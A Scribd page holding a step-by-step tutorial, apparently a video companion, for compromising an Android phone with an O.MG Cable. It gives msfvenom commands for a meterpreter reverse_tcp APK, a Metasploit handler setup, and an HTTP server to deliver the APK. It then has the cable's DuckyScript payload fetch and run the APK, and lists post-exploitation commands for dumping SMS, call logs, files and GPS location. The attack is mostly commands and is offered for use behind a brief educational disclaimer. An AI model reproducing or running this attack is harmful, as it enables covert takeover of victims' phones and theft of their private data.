Scribd Logo
Upload

Welcome to Scribd!

  • OMG Cable Android APK - Linode

    Uploaded by

    Yuvraj Singh
    588 views38 pages
    This document provides instructions for generating an APK payload to deploy on an O.MG Cable for gaining remote access to an Android device. It describes using Linode to set up an Ubuntu server, installing Metasploit on it, and using msfvenom to generate an APK with a reverse_tcp meterpreter payload. It then explains loading the payload onto the O.MG Cable by pasting it into the device's web interface and deploying the cable to initiate a connection back to the server. Finally, it lists some post-exploitation commands that can be used after establishing a meterpreter session.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document provides instructions for generating an APK payload to deploy on an O.MG Cable for gaining remote access to an Android device. It describes using Linode to set up an Ubuntu server, installing Metasploit on it, and using msfvenom to generate an APK with a reverse_tcp meterpreter payload. It then explains loading the payload onto the O.MG Cable by pasting it into the device's web interface and deploying the cable to initiate a connection back to the server. Finally, it lists some post-exploitation commands that can be used after establishing a meterpreter session.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    588 views38 pages

    OMG Cable Android APK - Linode

    Uploaded by

    Yuvraj Singh
    This document provides instructions for generating an APK payload to deploy on an O.MG Cable for gaining remote access to an Android device. It describes using Linode to set up an Ubuntu server, installing Metasploit on it, and using msfvenom to generate an APK with a reverse_tcp meterpreter payload. It then explains loading the payload onto the O.MG Cable by pasting it into the device's web interface and deploying the cable to initiate a connection back to the server. Finally, it lists some post-exploitation commands that can be used after establishing a meterpreter session.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 38

    Generate APK to put on O.

    MG Cable
    Disclaimer

    This document DOES NOT promote or encourage any illegal activities!


    The content in this document is provided solely for educational purposes and to create
    awareness!
    Watch YouTube Video

    This document is a companion to my YouTube video:


    • https://youtu.be/Qb8Wvo9u5zE
    Requirements

    1. A Directional O.MG Cable USB-C to USB-C Cable

    ACTIVE END WITH USB


    WHICH DEPLOYS
    O.MG USB-C TO USB-C PAYLOAD
    Requirements

    2. A Linode account.
    3. An Android Phone.
    1. Generate APK to download using O.MG Cable

    • Create your own virtual machine on Linode with a 60-day $100


    credit: https://davidbombal.wiki/linode

    • If that link doesn't work for you, try this link:


    https://www.linode.com/lp/youtube-
    viewers/?ifso=davidbombal

    • Please note: Credits expire in 60 days. Big thanks to Linode for


    sponsoring my videos!
    1. Generate APK to download using O.MG Cable

    1. Login to Linode.
    2. Click on Create Linode.
    1. Generate APK to download using O.MG Cable

    3. Choose distribution Ubuntu 21.10 and your Region of choice.


    1. Generate APK to download using O.MG Cable

    4. You can use a Shared CPU – Nanode 1 GB is good enough for this demo.
    1. Generate APK to download using O.MG Cable

    5. Set the Linode Label to something that makes sense to you, and choose a password.
    1. Generate APK to download using O.MG Cable

    6. Click on Create Linode.


    1. Generate APK to download using O.MG Cable

    7. SSH into your Linode machine. Using your credentials.


    1. Generate APK to download using O.MG Cable

    8. Enter yes when ask if you are sure you want to continue connecting.
    1. Generate APK to put on O.MG Cable (Linode)

    9. Enter your password for your Linode machine.


    1. Generate APK to download using O.MG Cable

    10. You are now ready to use your Ubuntu machine on Linode.
    1. Generate APK to download using O.MG Cable

    11. Enter the following command to download the Metasploit framework.

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-
    wrappers/msfupdate.erb > msfinstall && \
    chmod 755 msfinstall && \
    ./msfinstall

    Documentation with detailed instructions: https://docs.metasploit.com/docs/using-


    metasploit/getting-started/nightly-installers.html
    1. Generate APK to download using O.MG Cable

    12. Metasploit Framework is now installed in the /opt/Metasploit-framework/bin/


    directory
    1. Generate APK to download using O.MG Cable

    13. Run the following commands:

    cd /opt/metasploit-framework/bin
    sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<linode_ip> LPORT=4444 -o /data/omg.apk
    1. Generate APK to download using O.MG Cable

    14. Run the following commands:

    msfconsole
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
    msf6 exploit(multi/handler) > set lport 4444
    msf6 exploit(multi/handler) > set lhost eth0
    msf6 exploit(multi/handler) > run
    1. Generate APK to download using O.MG Cable

    14. Open a new terminal. SSH into the Linode Ubuntu machine, and run the following
    command:
    python3 -m http.server 8000
    2. Load O.MG Cable Payload

    O.MG Specific Steps


    2. Load O.MG Cable Payload

    1. Make sure your O.MG Cable is plugged into a device. Connect to the O.MG Cable WiFi.
    2. Load O.MG Cable Payload

    2. In your browser open http://192.168.4.1


    2. Load O.MG Cable Payload

    3. Get the payload for either Android 10 or Android 11 from the following page:
    • Android 10 and 11: https://github.com/hak5/omg-
    payloads/tree/master/payloads/library/mobile/android/meterpreter
    • Android 9 (Samsung Galaxy S8+ - with only Chrome browser):
    https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter
    • Android 12 (Samsung Galaxy S22 Ultra – using Chrome browser as default):
    https://github.com/davidbombal/hak5/blob/0cbefc353e61cee8d7519d2ab986fad96bcd
    7aba/omg_androidS22Ultra.txt
    2. Load O.MG Cable Payload

    4. Copy the payload into the DuckyPayload area. You may need to edit the script to work
    for different vendor specific versions of Android.
    2. Load O.MG Cable Payload

    5. Update the IP Address and port number to that of your Kali / Cloud server.
    2. Load O.MG Cable Payload

    6. Put the O.MG Cable payload side in the Android phone’s USB-C port.
    7. On the browser with the DuckyScript Payload Area open click RUN.
    3. Once Reverse Shell is Established -> Meterpreter

    1. Once the reverse shell has been established you will see meterpreter > on your screen.
    2. You can use the following commands on the Android device:
    • pwd – Prints the current working directory on the phone.
    • ifconfig – Shows all the network interfaces on the phone.
    • ps – Shows the current processes that the Android operating system is running.
    • sysinfo – Shows basic information about the Android device.
    • send_sms -d “<phone_number>" -t “<text_content>"
    3. Once Reverse Shell is Established -> Meterpreter

    • geolocate – You can get the GPS coordinates for the Android phone.
    • dump_sms – Extracts all sms messages and save it as a text file.
    • dump_calllog – Get call log.
    • upload – Allows you to upload a file to the Android device remotely.
    • download – Allows you to download files from the Android device remotely.
    • wlan_geolocate – Get current lat-long using WLAN information.
    • getuid - Running getuid will display the user that the Meterpreter server is running
    as on the host.
    3. Once Reverse Shell is Established -> Meterpreter

    Requires that the Android phone has a sim card from a service provider.
    3. Once Reverse Shell is Established -> Meterpreter
    Optional Extras (MSFVenom – Payload Explanation)

    MSFVenom payload breakdown


    Optional Extras (MSFVenom – Payload Explanation)
    sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<ip_address> LPORT=4444 -o /data/omg.apk

    • -p is for the payload which you’ll use. In this case android/meterpreter_reverse_tcp


    • LHOST is for the localhost or server IP which will receive the back connection.
    • LPORT is for the localhost or server port which the connection listen on for the victim.
    • -o is for out, where you save the payload.
    Sign APK – Additional Steps (Unnecessary)

    • Update Linux instance by running the following commands:

    sudo apt update


    sudo apt install openjdk-17-jdk
    Sign APK – Additional Steps (Unnecessary)

    • Sign APK – Run the following commands:


    sudo keytool -genkey –V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
    sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore omg.apk hacked
    Sign APK – Additional Steps (Unnecessary)

    • Install Zipalign

    sudo apt install zipalign


    Sign APK – Additional Steps (Unnecessary)

    • Verify the .apk by using zipalign

    sudo zipalign -v 4 omg.apk signed_omg.apk


    Get more information

    1. Website: https://www.youtube.com/davidbombal
    2. Website: https://hak5.org/
    3. Website: https://github.com/hak5/omg-
    payloads/tree/master/payloads/library/mobile/android/meterpreter
    4. Website: https://www.offensive-security.com/metasploit-unleashed/meterpreter-
    basics/
    We would like to acknowledge the following people:
    • int0x80
    • @_MG_
    • Drewsec (https://www.youtube.com/channel/UCBWVaokY_7yCpVn-X0Ny9aA/)

    You might also like